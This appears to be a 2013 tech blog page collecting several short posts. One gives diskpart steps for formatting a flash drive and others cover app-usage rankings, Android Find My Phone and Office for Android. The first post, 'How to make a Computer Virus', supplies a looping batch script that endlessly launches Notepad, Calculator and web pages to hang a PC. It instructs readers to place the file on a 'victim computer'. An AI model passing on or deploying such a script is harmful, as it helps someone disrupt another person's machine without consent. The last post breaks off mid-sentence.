Showing posts with label Latest Tech. Show all posts
Showing posts with label Latest Tech. Show all posts

Saturday, 17 August 2013

How to make a Computer Virus

batch file is a  text file with the file extension .bat, which is interpreted by the command processor, i.e
M.S Dos.
It contain  some set of commands which is executed automatically when some one click on the file.. so it very easy to make virus by using batch file..

 Now i am going to tell you how to do such stuffs..

 How to make a  Computer Virus?

Ans:for this you must know some of the basics command like. echo,start ,pause, kill ,call etc

Step1 :- open Notepad
Step2:-  copy the following code.
@echo off
:d
start  notepad
start   www.langadda.blogspot.com
start   www.toolsadda.blogsspot.com
start   calc
goto :d

Step 3:- save the file with bat extension. name could be anything.
Step 4:- Now copy this bat file and paste it on victim  computer.

 NOTE:-Don't click the file otherwise this code will hang your PC 

You can make it more complex by inserting some more command with in the label. 

start command will run the applications mentioned .i.e notepad ,calculater,browser. etc
:d is a label.
goto is used to jump the interpreter over the label.


 For any doubt pl z comment...

Thursday, 8 August 2013

Google Maps is now most widely app















Google Maps is now most widely used in worlds according to Global Web Index with the Percentage of 54.Facebook holds second position with 44% followed by You tube and Google+.
Skype is at & position and whats app at 9th.
According to Global Web Index the top ten most accessed apps are follows:
01.   Google Maps - 54%
02.   Facebook - 44%
03.   YouTube -35%
04.   Google+ - 30%
05.   Weixin /We-chat - 27%
06.   Twitter - 22%
07.   Skype - 22%
08.   Facebook Messenger - 22%
09.   Whats-app - 17%
10.   Instagram - 11%

Find My Phone for Andriod



After a long journey for four years finally Google  launched an Android equivalent to Apple's ,find my phone app ,which is used to track down  missing phone or tabs. The Apple's user using this app since 2009 .
This service will allow you to call your phone and make it ring at maximum volume (even if it is silent) in case it has been misplaced at home and view its location on a map if it was left at a restaurant or somewhere else further . And, if it   was stolen, the owner can quickly and securely remote wipe all information on it.

This service is compatible with Android running on Fro yo and above versions.


Thursday, 1 August 2013

MS office for Andriod

Finally Microsoft has  decided to launch its Office 365 for Android. The software was out since 31 July and its costs a $100-a-year for subscription and it not to be sold separately.  As far now it is only compatible with Android Smartphone that runs on ICS or above, but it is  not for Android tablets . Initially, it’s available only in the U.S, though the company decided to expand  it to other  markets with versions in more than 30 languages.








As per the success of Office 365  for the iPhone's last month, Microsoft  make its product compelling on other platforms too. 

How to format corrupted or write protected flash drive

To format corrupted or write protected flash drive please follow the steps:- 

  1. Open command prompt as administrator.
  2. Type diskpart.
  3. Type list disk.It will generate a list of drive attached to the system.
  4. Type select disk n.(n=disk which is corrupted and you want to format.)
  5. Type clean.
  6. Type create partition primary.
  7. Type select partition 1.
  8. Type assign.
  9. Type format.(flash drive begin to format.)

Monday, 7 January 2013

Practice programming & compare your coding

                                             Practice programming & compare your coding on